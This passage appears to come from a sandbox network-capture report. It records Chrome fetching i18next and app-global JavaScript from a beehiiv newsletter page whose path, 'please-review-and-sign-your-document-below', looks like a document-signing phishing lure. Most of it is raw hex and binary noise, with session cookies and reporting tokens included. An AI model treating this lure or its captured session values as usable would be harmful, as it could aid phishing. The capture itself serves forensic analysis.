                                                                                                                                            2025-01-15 18:14:33 UTC1369INData Raw: d1 b2 ae 56 19 82 2c 04 df c5 7a b2 74 d5 5c 3c 62 93 f7 f5 d4 89 58 f9 cd 8c 8d 27 8b c0 64 ab 6a 5d fb 8e 6f 59 5a ad cb d8 15 04 9e 13 3d fe 3f 9b 86 1e 56 44 61 e3 4f e6 93 e5 3d 2d 62 99 bd 5a 38 d3 eb 9b c6 27 6b 0b 0d 09 f9 d4 db 66 d4 01 ff 5b a6 f2 13 b3 9e 2f 16 8a 68 bb ef e6 4a 08 e3 91 b6 ed 25 91 7c ce 4e 89 8f c5 63 45 17 57 5f 22 30 a2 32 59 66 8e 68 d1 85 b0 40 b8 68 c4 2f 19 da 13 b3 07 45 9c c4 91 a9 1f f7 b4 13 6b 69 42 16 8e fb bf 7e 64 78 3c 04 07 01 12 cd 7e d1 be f5 20 40 16 4d e9 67 dd 4b d9 fe 43 15 46 ea ab b1 2b ca 12 f2 9f 4a 27 4a 3f a3 a8 e5 5c ec fa 80 0f 91 d0 c9 d2 f2 4c 46 0b 12 87 9f 3f ec 6b bf b1 a1 08 cf 03 0b 45 66 8b ea f6 3d 65 94 61 96 37 86 5c 6d 10 17 0b 6f 34 61 2a 2b 92 d5 83 34 1c 1d 70 8c 63 53 71 e4 aa 17
                                                                                                                                            Data Ascii: V,zt\<bX'dj]oYZ=?VDaO=-bZ8'kf[/hJ%|NcEW_"02Yfh@h/EkiB~dx<~ @MgKCF+J'J?\LF?kEf=ea7\mo4a*+4pcSq
                                                                                                                                            2025-01-15 18:14:33 UTC1369INData Raw: e7 29 45 eb 97 ee a9 4b 89 b9 64 6a f3 67 7b 07 b9 3b e0 a9 4d 3f ce 9e ed 2c b9 37 fe ff 6d 54 9e 29 f5 dd 5e 67 3e 19 7c 96 a3 1d d2 dc 46 30 50 eb 22 52 d8 45 3f b8 2d a1 1b 7e f2 4d df b3 aa e1 73 74 38 0c bb 17 47 72 ce 0f 6b ae c6 2e dd 27 2b c2 e6 31 92 78 c6 61 be fa 6f c3 23 88 5d 0b 6e c3 df 9b a6 e5 91 7a 8b ae 8e fb d3 62 8b 7c 39 b1 3f 27 e5 c2 56 2c fd 4a ad 65 c7 1d 3a 90 f9 3d ef 8b 1e 1e 55 13 62 df 0d 2f b9 b6 8e b8 31 87 1f d6 b6 d0 e5 e2 0e d6 25 4c dc 59 2d e5 b1 5a 8b 8e 3b 94 1b 35 30 27 ab fb a3 16 7a 67 af 84 75 80 61 5d 95 a4 1a c7 18 73 78 9f df f8 b8 b8 d3 dc ae 9a 63 bc ea 7a 6f d6 51 6c dc 2d bf d3 4f 1d a9 0e da 2d 32 7f c6 e9 64 df f8 ac 58 b5 94 7b 70 48 55 bb b9 6e 8c 74 c8 6e b6 a0 9c 9d 35 22 6b b9 bf 67 a3 96 b2 e3 2e
                                                                                                                                            Data Ascii: )EKdjg{;M?,7mT)^g>|F0P"RE?-~Mst8Grk.'+1xao#]nzb|9?'V,Je:=Ub/1%LY-Z;50'zgua]sxczoQl-O-2dX{pHUntn5"kg.
                                                                                                                                            2025-01-15 18:14:33 UTC1369INData Raw: 68 5a ff 71 5f 7b 5a 5b 27 d8 93 7c 80 88 7e 7c 93 4c 52 dd 77 de 2f 6e c9 38 42 fd 49 3a 40 0a 9f 9a fd 77 5b 28 1e 9a 35 bc 28 56 74 84 6c d0 89 07 88 f3 33 03 67 5a 28 1e 9a b5 19 e6 26 cb f6 13 42 27 1e 20 32 96 52 46 2d 14 0f cd 7a db 4f f1 8e a3 74 d1 93 0e 90 a9 96 a9 d3 93 3b 78 7d 58 68 6b d6 57 9f 16 77 29 ee 4a 3c 40 9c 76 52 d8 3e 4b 85 5d 37 0b 90 b6 eb 4f f2 01 22 e1 eb 4a 0b e5 43 a3 d6 aa a7 d9 7e 84 24 1f 20 fe 73 a7 cf 42 61 d7 11 20 4d 15 8f 00 49 02 01 d2 54 f1 08 90 24 10 20 4d 15 8f 00 49 02 01 d2 54 f1 08 90 24 10 20 4d 15 8f 00 49 02 01 d2 54 f1 08 90 24 10 20 4d 15 8f 00 49 02 01 d2 54 f1 08 90 24 10 20 4d 15 8f 00 49 02 01 d2 54 f1 08 90 24 10 20 4d 15 8f 00 49 02 01 d2 54 f1 08 90 24 10 20 4d 15 8f 00 49 02 01 d2 54 f1 08 90 24
                                                                                                                                            Data Ascii: hZq_{Z['|~|LRw/n8BI:@w[(5(Vtl3gZ(&B' 2RF-zOt;x}XhkWw)J<@vR>K]7O"JC~$ sBa MIT$ MIT$ MIT$ MIT$ MIT$ MIT$ MIT$
                                                                                                                                            2025-01-15 18:14:33 UTC288INData Raw: a0 56 f5 57 e3 d5 ea 6f 34 a1 33 3a 18 10 26 4b 2a 37 a6 a1 4e 96 99 fd af 69 e6 e6 81 97 3a e5 7e cd 28 ab 3e 46 da 19 4b 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                            Data Ascii: VWo43:&K*7Ni:~(>FK


                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                            14192.168.2.1649728104.18.69.404436900C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                            2025-01-15 18:14:33 UTC842OUTGET /assets/i18next-BV1g0mjb.js HTTP/1.1
                                                                                                                                            Host: kanes-newsletter-871ead.beehiiv.com
                                                                                                                                            Connection: keep-alive
                                                                                                                                            sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                            Origin: https://kanes-newsletter-871ead.beehiiv.com
                                                                                                                                            sec-ch-ua-mobile: ?0
                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                            sec-ch-ua-platform: "Windows"
                                                                                                                                            Accept: */*
                                                                                                                                            Sec-Fetch-Site: same-origin
                                                                                                                                            Sec-Fetch-Mode: cors
                                                                                                                                            Sec-Fetch-Dest: script
                                                                                                                                            Referer: https://kanes-newsletter-871ead.beehiiv.com/p/please-review-and-sign-your-document-below
                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                            Cookie: __cf_bm=t1Fh0BcpV0SOaArg44wQqvHJ6eOZqrp8ju2X4P9gJ1Q-1736964871-1.0.1.1-8msfSrG.4jE02ExjAY2XvlEHJYje6PKQiLD3pDhYWiVzx8VaW4mRZex8mRH1GKAMiAw3TiXfeTt4v72pcM1HFQ
                                                                                                                                            2025-01-15 18:14:33 UTC914INHTTP/1.1 200 OK
                                                                                                                                            Date: Wed, 15 Jan 2025 18:14:33 GMT
                                                                                                                                            Content-Type: application/javascript; charset=UTF-8
                                                                                                                                            Content-Length: 49198
                                                                                                                                            Connection: close
                                                                                                                                            Report-To: {"group":"heroku-nel","max_age":3600,"endpoints":[{"url":"https://nel.heroku.com/reports?ts=1736960704&sid=1b10b0ff-8a76-4548-befa-353fc6c6c045&s=ZSTm5tjtoUyepT8GE0uMWa%2BNcCEepGTOSPZjUVss40E%3D"}]}
                                                                                                                                            Reporting-Endpoints: heroku-nel=https://nel.heroku.com/reports?ts=1736960704&sid=1b10b0ff-8a76-4548-befa-353fc6c6c045&s=ZSTm5tjtoUyepT8GE0uMWa%2BNcCEepGTOSPZjUVss40E%3D
                                                                                                                                            Nel: {"report_to":"heroku-nel","max_age":3600,"success_fraction":0.005,"failure_fraction":0.05,"response_headers":["Via"]}
                                                                                                                                            Cache-Control: public, max-age=31536000, immutable
                                                                                                                                            Last-Modified: Tue, 24 Dec 2024 16:29:01 GMT
                                                                                                                                            Etag: W/"c02e-193f98014c8"
                                                                                                                                            Via: 1.1 vegur, 1.1 vegur
                                                                                                                                            CF-Cache-Status: HIT
                                                                                                                                            Age: 4160
                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                            Server: cloudflare
                                                                                                                                            CF-RAY: 9027d8999a604357-EWR
                                                                                                                                            2025-01-15 18:14:33 UTC455INData Raw: 0a 21 66 75 6e 63 74 69 6f 6e 28 29 7b 74 72 79 7b 76 61 72 20 65 3d 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 77 69 6e 64 6f 77 3f 77 69 6e 64 6f 77 3a 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 67 6c 6f 62 61 6c 3f 67 6c 6f 62 61 6c 3a 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 73 65 6c 66 3f 73 65 6c 66 3a 7b 7d 2c 6e 3d 28 6e 65 77 20 45 72 72 6f 72 29 2e 73 74 61 63 6b 3b 6e 26 26 28 65 2e 5f 73 65 6e 74 72 79 44 65 62 75 67 49 64 73 3d 65 2e 5f 73 65 6e 74 72 79 44 65 62 75 67 49 64 73 7c 7c 7b 7d 2c 65 2e 5f 73 65 6e 74 72 79 44 65 62 75 67 49 64 73 5b 6e 5d 3d 22 31 62 62 31 62 36 30 33 2d 39 30 39 63 2d 35 36 62 35 2d 62 33 33 66 2d 63 66 63 38 33 35 31 65 61 63 61 63 22 29 7d 63 61 74 63 68 28
                                                                                                                                            Data Ascii: !function(){try{var e="undefined"!=typeof window?window:"undefined"!=typeof global?global:"undefined"!=typeof self?self:{},n=(new Error).stack;n&&(e._sentryDebugIds=e._sentryDebugIds||{},e._sentryDebugIds[n]="1bb1b603-909c-56b5-b33f-cfc8351eacac")}catch(
                                                                                                                                            2025-01-15 18:14:33 UTC1369INData Raw: 73 74 72 75 63 74 6f 72 28 65 29 7b 6c 65 74 20 74 3d 61 72 67 75 6d 65 6e 74 73 2e 6c 65 6e 67 74 68 3e 31 26 26 61 72 67 75 6d 65 6e 74 73 5b 31 5d 21 3d 3d 76 6f 69 64 20 30 3f 61 72 67 75 6d 65 6e 74 73 5b 31 5d 3a 7b 7d 3b 74 68 69 73 2e 69 6e 69 74 28 65 2c 74 29 7d 69 6e 69 74 28 65 29 7b 6c 65 74 20 74 3d 61 72 67 75 6d 65 6e 74 73 2e 6c 65 6e 67 74 68 3e 31 26 26 61 72 67 75 6d 65 6e 74 73 5b 31 5d 21 3d 3d 76 6f 69 64 20 30 3f 61 72 67 75 6d 65 6e 74 73 5b 31 5d 3a 7b 7d 3b 74 68 69 73 2e 70 72 65 66 69 78 3d 74 2e 70 72 65 66 69 78 7c 7c 22 69 31 38 6e 65 78 74 3a 22 2c 74 68 69 73 2e 6c 6f 67 67 65 72 3d 65 7c 7c 75 65 2c 74 68 69 73 2e 6f 70 74 69 6f 6e 73 3d 74 2c 74 68 69 73 2e 64 65 62 75 67 3d 74 2e 64 65 62 75 67 7d 6c 6f 67 28 29 7b 66
                                                                                                                                            Data Ascii: structor(e){let t=arguments.length>1&&arguments[1]!==void 0?arguments[1]:{};this.init(e,t)}init(e){let t=arguments.length>1&&arguments[1]!==void 0?arguments[1]:{};this.prefix=t.prefix||"i18next:",this.logger=e||ue,this.options=t,this.debug=t.debug}log(){f
                                                                                                                                            2025-01-15 18:14:33 UTC1369INData Raw: 73 3d 6e 65 77 20 41 72 72 61 79 28 74 3e 31 3f 74 2d 31 3a 30 29 2c 6e 3d 31 3b 6e 3c 74 3b 6e 2b 2b 29 73 5b 6e 2d 31 5d 3d 61 72 67 75 6d 65 6e 74 73 5b 6e 5d 3b 74 68 69 73 2e 6f 62 73 65 72 76 65 72 73 5b 65 5d 26 26 41 72 72 61 79 2e 66 72 6f 6d 28 74 68 69 73 2e 6f 62 73 65 72 76 65 72 73 5b 65 5d 2e 65 6e 74 72 69 65 73 28 29 29 2e 66 6f 72 45 61 63 68 28 61 3d 3e 7b 6c 65 74 5b 6f 2c 6c 5d 3d 61 3b 66 6f 72 28 6c 65 74 20 66 3d 30 3b 66 3c 6c 3b 66 2b 2b 29 6f 28 2e 2e 2e 73 29 7d 29 2c 74 68 69 73 2e 6f 62 73 65 72 76 65 72 73 5b 22 2a 22 5d 26 26 41 72 72 61 79 2e 66 72 6f 6d 28 74 68 69 73 2e 6f 62 73 65 72 76 65 72 73 5b 22 2a 22 5d 2e 65 6e 74 72 69 65 73 28 29 29 2e 66 6f 72 45 61 63 68 28 61 3d 3e 7b 6c 65 74 5b 6f 2c 6c 5d 3d 61 3b 66 6f
                                                                                                                                            Data Ascii: s=new Array(t>1?t-1:0),n=1;n<t;n++)s[n-1]=arguments[n];this.observers[e]&&Array.from(this.observers[e].entries()).forEach(a=>{let[o,l]=a;for(let f=0;f<l;f++)o(...s)}),this.observers["*"]&&Array.from(this.observers["*"].entries()).forEach(a=>{let[o,l]=a;fo
                                                                                                                                            2025-01-15 18:14:33 UTC1369INData Raw: 65 28 69 2c 65 2c 74 29 7b 66 6f 72 28 63 6f 6e 73 74 20 73 20 69 6e 20 65 29 73 21 3d 3d 22 5f 5f 70 72 6f 74 6f 5f 5f 22 26 26 73 21 3d 3d 22 63 6f 6e 73 74 72 75 63 74 6f 72 22 26 26 28 73 20 69 6e 20 69 3f 74 79 70 65 6f 66 20 69 5b 73 5d 3d 3d 22 73 74 72 69 6e 67 22 7c 7c 69 5b 73 5d 69 6e 73 74 61 6e 63 65 6f 66 20 53 74 72 69 6e 67 7c 7c 74 79 70 65 6f 66 20 65 5b 73 5d 3d 3d 22 73 74 72 69 6e 67 22 7c 7c 65 5b 73 5d 69 6e 73 74 61 6e 63 65 6f 66 20 53 74 72 69 6e 67 3f 74 26 26 28 69 5b 73 5d 3d 65 5b 73 5d 29 3a 72 65 28 69 5b 73 5d 2c 65 5b 73 5d 2c 74 29 3a 69 5b 73 5d 3d 65 5b 73 5d 29 3b 72 65 74 75 72 6e 20 69 7d 66 75 6e 63 74 69 6f 6e 20 43 28 69 29 7b 72 65 74 75 72 6e 20 69 2e 72 65 70 6c 61 63 65 28 2f 5b 5c 2d 5c 5b 5c 5d 5c 2f 5c 7b
                                                                                                                                            Data Ascii: e(i,e,t){for(const s in e)s!=="__proto__"&&s!=="constructor"&&(s in i?typeof i[s]=="string"||i[s]instanceof String||typeof e[s]=="string"||e[s]instanceof String?t&&(i[s]=e[s]):re(i[s],e[s],t):i[s]=e[s]);return i}function C(i){return i.replace(/[\-\[\]\/\{
                                                                                                                                            2025-01-15 18:14:33 UTC1369INData Raw: 72 69 6e 67 22 2c 22 6e 75 6d 62 65 72 22 2c 22 62 6f 6f 6c 65 61 6e 22 5d 2e 69 6e 64 65 78 4f 66 28 74 79 70 65 6f 66 20 61 29 3e 2d 31 26 26 6c 3c 73 2e 6c 65 6e 67 74 68 2d 31 29 63 6f 6e 74 69 6e 75 65 3b 72 2b 3d 6c 2d 72 2b 31 3b 62 72 65 61 6b 7d 6e 3d 61 7d 72 65 74 75 72 6e 20 6e 7d 66 75 6e 63 74 69 6f 6e 20 48 28 69 29 7b 72 65 74 75 72 6e 20 69 26 26 69 2e 69 6e 64 65 78 4f 66 28 22 5f 22 29 3e 30 3f 69 2e 72 65 70 6c 61 63 65 28 22 5f 22 2c 22 2d 22 29 3a 69 7d 63 6c 61 73 73 20 71 20 65 78 74 65 6e 64 73 20 4a 7b 63 6f 6e 73 74 72 75 63 74 6f 72 28 65 29 7b 6c 65 74 20 74 3d 61 72 67 75 6d 65 6e 74 73 2e 6c 65 6e 67 74 68 3e 31 26 26 61 72 67 75 6d 65 6e 74 73 5b 31 5d 21 3d 3d 76 6f 69 64 20 30 3f 61 72 67 75 6d 65 6e 74 73 5b 31 5d 3a 7b
                                                                                                                                            Data Ascii: ring","number","boolean"].indexOf(typeof a)>-1&&l<s.length-1)continue;r+=l-r+1;break}n=a}return n}function H(i){return i&&i.indexOf("_")>0?i.replace("_","-"):i}class q extends J{constructor(e){let t=arguments.length>1&&arguments[1]!==void 0?arguments[1]:{
                                                                                                                                            2025-01-15 18:14:33 UTC1369INData Raw: 72 3b 6c 65 74 20 6f 3d 5b 65 2c 74 5d 3b 73 26 26 28 6f 3d 6f 2e 63 6f 6e 63 61 74 28 61 3f 73 2e 73 70 6c 69 74 28 61 29 3a 73 29 29 2c 65 2e 69 6e 64 65 78 4f 66 28 22 2e 22 29 3e 2d 31 26 26 28 6f 3d 65 2e 73 70 6c 69 74 28 22 2e 22 29 2c 6e 3d 74 2c 74 3d 6f 5b 31 5d 29 2c 74 68 69 73 2e 61 64 64 4e 61 6d 65 73 70 61 63 65 73 28 74 29 2c 58 28 74 68 69 73 2e 64 61 74 61 2c 6f 2c 6e 29 2c 72 2e 73 69 6c 65 6e 74 7c 7c 74 68 69 73 2e 65 6d 69 74 28 22 61 64 64 65 64 22 2c 65 2c 74 2c 73 2c 6e 29 7d 61 64 64 52 65 73 6f 75 72 63 65 73 28 65 2c 74 2c 73 29 7b 6c 65 74 20 6e 3d 61 72 67 75 6d 65 6e 74 73 2e 6c 65 6e 67 74 68 3e 33 26 26 61 72 67 75 6d 65 6e 74 73 5b 33 5d 21 3d 3d 76 6f 69 64 20 30 3f 61 72 67 75 6d 65 6e 74 73 5b 33 5d 3a 7b 73 69 6c 65
                                                                                                                                            Data Ascii: r;let o=[e,t];s&&(o=o.concat(a?s.split(a):s)),e.indexOf(".")>-1&&(o=e.split("."),n=t,t=o[1]),this.addNamespaces(t),X(this.data,o,n),r.silent||this.emit("added",e,t,s,n)}addResources(e,t,s){let n=arguments.length>3&&arguments[3]!==void 0?arguments[3]:{sile
                                                                                                                                            2025-01-15 18:14:33 UTC1369INData Raw: 73 2c 6e 29 7b 72 65 74 75 72 6e 20 69 2e 66 6f 72 45 61 63 68 28 72 3d 3e 7b 74 68 69 73 2e 70 72 6f 63 65 73 73 6f 72 73 5b 72 5d 26 26 28 65 3d 74 68 69 73 2e 70 72 6f 63 65 73 73 6f 72 73 5b 72 5d 2e 70 72 6f 63 65 73 73 28 65 2c 74 2c 73 2c 6e 29 29 7d 29 2c 65 7d 7d 3b 63 6f 6e 73 74 20 5f 3d 7b 7d 3b 63 6c 61 73 73 20 7a 20 65 78 74 65 6e 64 73 20 4a 7b 63 6f 6e 73 74 72 75 63 74 6f 72 28 65 29 7b 6c 65 74 20 74 3d 61 72 67 75 6d 65 6e 74 73 2e 6c 65 6e 67 74 68 3e 31 26 26 61 72 67 75 6d 65 6e 74 73 5b 31 5d 21 3d 3d 76 6f 69 64 20 30 3f 61 72 67 75 6d 65 6e 74 73 5b 31 5d 3a 7b 7d 3b 73 75 70 65 72 28 29 2c 66 65 28 5b 22 72 65 73 6f 75 72 63 65 53 74 6f 72 65 22 2c 22 6c 61 6e 67 75 61 67 65 55 74 69 6c 73 22 2c 22 70 6c 75 72 61 6c 52 65 73 6f
                                                                                                                                            Data Ascii: s,n){return i.forEach(r=>{this.processors[r]&&(e=this.processors[r].process(e,t,s,n))}),e}};const _={};class z extends J{constructor(e){let t=arguments.length>1&&arguments[1]!==void 0?arguments[1]:{};super(),fe(["resourceStore","languageUtils","pluralReso
                                                                                                                                            2025-01-15 18:14:33 UTC1369INData Raw: 2e 6f 76 65 72 6c 6f 61 64 54 72 61 6e 73 6c 61 74 69 6f 6e 4f 70 74 69 6f 6e 48 61 6e 64 6c 65 72 28 61 72 67 75 6d 65 6e 74 73 29 29 2c 74 79 70 65 6f 66 20 74 3d 3d 22 6f 62 6a 65 63 74 22 26 26 28 74 3d 7b 2e 2e 2e 74 7d 29 2c 74 7c 7c 28 74 3d 7b 7d 29 2c 65 3d 3d 6e 75 6c 6c 29 72 65 74 75 72 6e 22 22 3b 41 72 72 61 79 2e 69 73 41 72 72 61 79 28 65 29 7c 7c 28 65 3d 5b 53 74 72 69 6e 67 28 65 29 5d 29 3b 63 6f 6e 73 74 20 6e 3d 74 2e 72 65 74 75 72 6e 44 65 74 61 69 6c 73 21 3d 3d 76 6f 69 64 20 30 3f 74 2e 72 65 74 75 72 6e 44 65 74 61 69 6c 73 3a 74 68 69 73 2e 6f 70 74 69 6f 6e 73 2e 72 65 74 75 72 6e 44 65 74 61 69 6c 73 2c 72 3d 74 2e 6b 65 79 53 65 70 61 72 61 74 6f 72 21 3d 3d 76 6f 69 64 20 30 3f 74 2e 6b 65 79 53 65 70 61 72 61 74 6f 72 3a
                                                                                                                                            Data Ascii: .overloadTranslationOptionHandler(arguments)),typeof t=="object"&&(t={...t}),t||(t={}),e==null)return"";Array.isArray(e)||(e=[String(e)]);const n=t.returnDetails!==void 0?t.returnDetails:this.options.returnDetails,r=t.keySeparator!==void 0?t.keySeparator:
                                                                                                                                            2025-01-15 18:14:33 UTC1369INData Raw: 68 69 73 2e 6f 70 74 69 6f 6e 73 2e 72 65 74 75 72 6e 65 64 4f 62 6a 65 63 74 48 61 6e 64 6c 65 72 3f 74 68 69 73 2e 6f 70 74 69 6f 6e 73 2e 72 65 74 75 72 6e 65 64 4f 62 6a 65 63 74 48 61 6e 64 6c 65 72 28 64 2c 75 2c 7b 2e 2e 2e 74 2c 6e 73 3a 6f 7d 29 3a 60 6b 65 79 20 27 24 7b 61 7d 20 28 24 7b 74 68 69 73 2e 6c 61 6e 67 75 61 67 65 7d 29 27 20 72 65 74 75 72 6e 65 64 20 61 6e 20 6f 62 6a 65 63 74 20 69 6e 73 74 65 61 64 20 6f 66 20 73 74 72 69 6e 67 2e 60 3b 72 65 74 75 72 6e 20 6e 3f 28 68 2e 72 65 73 3d 79 2c 68 2e 75 73 65 64 50 61 72 61 6d 73 3d 74 68 69 73 2e 67 65 74 55 73 65 64 50 61 72 61 6d 73 44 65 74 61 69 6c 73 28 74 29 2c 68 29 3a 79 7d 69 66 28 72 29 7b 63 6f 6e 73 74 20 79 3d 41 72 72 61 79 2e 69 73 41 72 72 61 79 28 75 29 2c 4f 3d 79
                                                                                                                                            Data Ascii: his.options.returnedObjectHandler?this.options.returnedObjectHandler(d,u,{...t,ns:o}):`key '${a} (${this.language})' returned an object instead of string.`;return n?(h.res=y,h.usedParams=this.getUsedParamsDetails(t),h):y}if(r){const y=Array.isArray(u),O=y
                                                                                                                                            2025-01-15 18:14:33 UTC1369INData Raw: 64 2e 20 45 69 74 68 65 72 20 73 65 74 20 6b 65 79 53 65 70 61 72 61 74 6f 72 3a 20 66 61 6c 73 65 20 6f 6e 20 69 6e 69 74 20 6f 72 20 6d 61 6b 65 20 73 75 72 65 20 79 6f 75 72 20 74 72 61 6e 73 6c 61 74 69 6f 6e 73 20 61 72 65 20 70 75 62 6c 69 73 68 65 64 20 69 6e 20 6e 65 73 74 65 64 20 66 6f 72 6d 61 74 2e 22 29 7d 6c 65 74 20 45 3d 5b 5d 3b 63 6f 6e 73 74 20 54 3d 74 68 69 73 2e 6c 61 6e 67 75 61 67 65 55 74 69 6c 73 2e 67 65 74 46 61 6c 6c 62 61 63 6b 43 6f 64 65 73 28 74 68 69 73 2e 6f 70 74 69 6f 6e 73 2e 66 61 6c 6c 62 61 63 6b 4c 6e 67 2c 74 2e 6c 6e 67 7c 7c 74 68 69 73 2e 6c 61 6e 67 75 61 67 65 29 3b 69 66 28 74 68 69 73 2e 6f 70 74 69 6f 6e 73 2e 73 61 76 65 4d 69 73 73 69 6e 67 54 6f 3d 3d 3d 22 66 61 6c 6c 62 61 63 6b 22 26 26 54 26 26 54
                                                                                                                                            Data Ascii: d. Either set keySeparator: false on init or make sure your translations are published in nested format.")}let E=[];const T=this.languageUtils.getFallbackCodes(this.options.fallbackLng,t.lng||this.language);if(this.options.saveMissingTo==="fallback"&&T&&T


                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                            15192.168.2.1649729104.18.68.404436900C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                            2025-01-15 18:14:33 UTC555OUTGET /assets/AppGlobals-2Br-8bZs.js HTTP/1.1
                                                                                                                                            Host: kanes-newsletter-871ead.beehiiv.com
                                                                                                                                            Connection: keep-alive
                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                            Accept: */*
                                                                                                                                            Sec-Fetch-Site: none
                                                                                                                                            Sec-Fetch-Mode: cors
                                                                                                                                            Sec-Fetch-Dest: empty
                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                            Cookie: __cf_bm=t1Fh0BcpV0SOaArg44wQqvHJ6eOZqrp8ju2X4P9gJ1Q-1736964871-1.0.1.1-8msfSrG.4jE02ExjAY2XvlEHJYje6PKQiLD3pDhYWiVzx8VaW4mRZex8mRH1GKAMiAw3TiXfeTt4v72pcM1HFQ
                                                                                                                                            2025-01-15 18:14:33 UTC899INHTTP/1.1 200 OK
                                                                                                                                            Date: Wed, 15 Jan 2025 18:14:33 GMT
                                                                                                                                            Content-Type: application/javascript; charset=UTF-8
                                                                                                                                            Content-Length: 32343
                                                                                                                                            Connection: close
                                                                                                                                            Report-To: {"group":"heroku-nel","max_age":3600,"endpoints":[{"url":"https://nel.heroku.com/reports?ts=1736960859&sid=1b10b0ff-8a76-4548-befa-353fc6c6c045&s=Gdulw2GN2jMrsMu7f5DCs9PfaRHOo6uA4nm0vspAeHE%3D"}]}
                                                                                                                                            Reporting-Endpoints: heroku-nel=https://nel.heroku.com/reports?ts=1736960859&sid=1b10b0ff-8a76-4548-befa-353fc6c6c045&s=Gdulw2GN2jMrsMu7f5DCs9PfaRHOo6uA4nm0vspAeHE%3D
                                                                                                                                            Nel: {"report_to":"heroku-nel","max_age":3600,"success_fraction":0.005,"failure_fraction":0.05,"response_headers":["Via"]}
                                                                                                                                            Cache-Control: public, max-age=31536000, immutable
                                                                                                                                            Last-Modified: Tue, 24 Dec 2024 16:29:01 GMT
                                                                                                                                            Etag: W/"7e57-193f98014c8"
                                                                                                                                            Via: 1.1 vegur, 1.1 vegur
                                                                                                                                            CF-Cache-Status: HIT
                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                            Server: cloudflare
                                                                                                                                            CF-RAY: 9027d899bede4332-EWR
                                                                                                                                            2025-01-15 18:14:33 UTC470INData Raw: 0a 21 66 75 6e 63 74 69 6f 6e 28 29 7b 74 72 79 7b 76 61 72 20 65 3d 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 77 69 6e 64 6f 77 3f 77 69 6e 64 6f 77 3a 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 67 6c 6f 62 61 6c 3f 67 6c 6f 62 61 6c 3a 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 73 65 6c 66 3f 73 65 6c 66 3a 7b 7d 2c 6e 3d 28 6e 65 77 20 45 72 72 6f 72 29 2e 73 74 61 63 6b 3b 6e 26 26 28 65 2e 5f 73 65 6e 74 72 79 44 65 62 75 67 49 64 73 3d 65 2e 5f 73 65 6e 74 72 79 44 65 62 75 67 49 64 73 7c 7c 7b 7d 2c 65 2e 5f 73 65 6e 74 72 79 44 65 62 75 67 49 64 73 5b 6e 5d 3d 22 66 63 36 64 33 38 34 61 2d 33 61 30 64 2d 35 38 62 31 2d 38 35 63 66 2d 62 65 66 63 37 63 31 66 61 32 64 35 22 29 7d 63 61 74 63 68 28
                                                                                                                                            Data Ascii: !function(){try{var e="undefined"!=typeof window?window:"undefined"!=typeof global?global:"undefined"!=typeof self?self:{},n=(new Error).stack;n&&(e._sentryDebugIds=e._sentryDebugIds||{},e._sentryDebugIds[n]="fc6d384a-3a0d-58b1-85cf-befc7c1fa2d5")}catch(
                                                                                                                                            2025-01-15 18:14:33 UTC1369INData Raw: 3a 72 65 74 75 72 6e 20 46 28 74 2c 45 72 72 6f 72 29 7d 7d 66 75 6e 63 74 69 6f 6e 20 6b 28 74 2c 65 29 7b 72 65 74 75 72 6e 20 45 74 2e 63 61 6c 6c 28 74 29 3d 3d 3d 60 5b 6f 62 6a 65 63 74 20 24 7b 65 7d 5d 60 7d 66 75 6e 63 74 69 6f 6e 20 63 6e 28 74 29 7b 72 65 74 75 72 6e 20 6b 28 74 2c 22 45 72 72 6f 72 45 76 65 6e 74 22 29 7d 66 75 6e 63 74 69 6f 6e 20 75 6e 28 74 29 7b 72 65 74 75 72 6e 20 6b 28 74 2c 22 44 4f 4d 45 72 72 6f 72 22 29 7d 66 75 6e 63 74 69 6f 6e 20 66 6e 28 74 29 7b 72 65 74 75 72 6e 20 6b 28 74 2c 22 44 4f 4d 45 78 63 65 70 74 69 6f 6e 22 29 7d 66 75 6e 63 74 69 6f 6e 20 55 28 74 29 7b 72 65 74 75 72 6e 20 6b 28 74 2c 22 53 74 72 69 6e 67 22 29 7d 66 75 6e 63 74 69 6f 6e 20 50 74 28 74 29 7b 72 65 74 75 72 6e 20 74 79 70 65 6f 66
